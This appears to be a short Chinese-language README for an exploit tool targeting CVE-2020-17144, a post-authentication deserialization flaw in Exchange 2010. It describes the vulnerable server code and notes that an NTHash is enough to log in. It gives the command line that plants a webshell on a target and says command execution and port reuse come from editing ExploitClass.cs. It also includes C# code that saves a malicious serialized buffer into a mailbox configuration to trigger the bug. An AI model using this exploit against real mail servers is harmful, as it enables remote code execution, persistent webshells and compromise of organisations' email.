和CVE-2018-8302、CVE-2020-0688类似,CVE-2020-17144同属需登录后利用的反序列化漏洞,但仅影响Exchange2010服务器。
与CVE-2020-0688不同,由于漏洞本身有趣的成因和触发条件,在利用时无需明文密码,只要具备NTHash即可成功,在利用方式上会相对更加灵活。同时,存在漏洞的功能点本身具备持久化功能,利用成功后将直接进行持久化行为,在不修复漏洞的情况下将永远存在,其危害性和隐蔽性远大于CVE-2020-0688
internal bool LoadModel(out LearningModel learningModel, out MessageTransformer messageTransformer, bool parseFai)
{
...
return DeserializeModelFAI(userConfiguration, out learningModel, out messageTransformer);
...
}
DeserializeModelFAI 直接将用户可空的个人配置作为参数传入造成RCE
CVE-2020-17144-EXP
条件: Exchange2010; 普通用户
默认用法(写webshell): CVE-2020-17144-EXP.exe mail.example.com user pass
执行命令 & 端口复用: 修改ExploitClass.cs
参考 @zcgonvh
https://mp.weixin.qq.com/s?__biz=MzI2NDk0MTM5MQ==&mid=2247483712&idx=1&sn=0b2cc3c9692f5c58a4eeb246d4b392fc&chksm=eaa5bb60ddd23276baf4cfd3fc59ca847c28f350c65ef98a17d49bc9944d653fad95dec4fd14&mpshare=1&scene=1&srcid=1209jtbQLVJIgr3VT0Ut1TM9&sharer_sharetime=1607483575995&sharer_shareid=dc9cecc79ba34e4bbb700a43a16153fd#rd
ExchangeService service = new ExchangeService(ExchangeVersion.Exchange2010);
service.Credentials = new WebCredentials("zcgonvh","P@ssw0rd!");
service.Url = new Uri("https://target/ews/Exchange.asmx");
{
byte[] data = EVIL-SERIALIZED-BUFFER;
UserConfiguration u = null;
Folder folder = Folder.Bind(service, WellKnownFolderName.Inbox);
u = new UserConfiguration(service);
u.BinaryData = data;
u.Save("MRM.AutoTag.Model", folder.Id);
}
ref:
https://github.com/Airboi/CVE-2020-17144-EXP
https://mp.weixin.qq.com/s/nVtE-OFoO076x6T0147AMw
陈师傅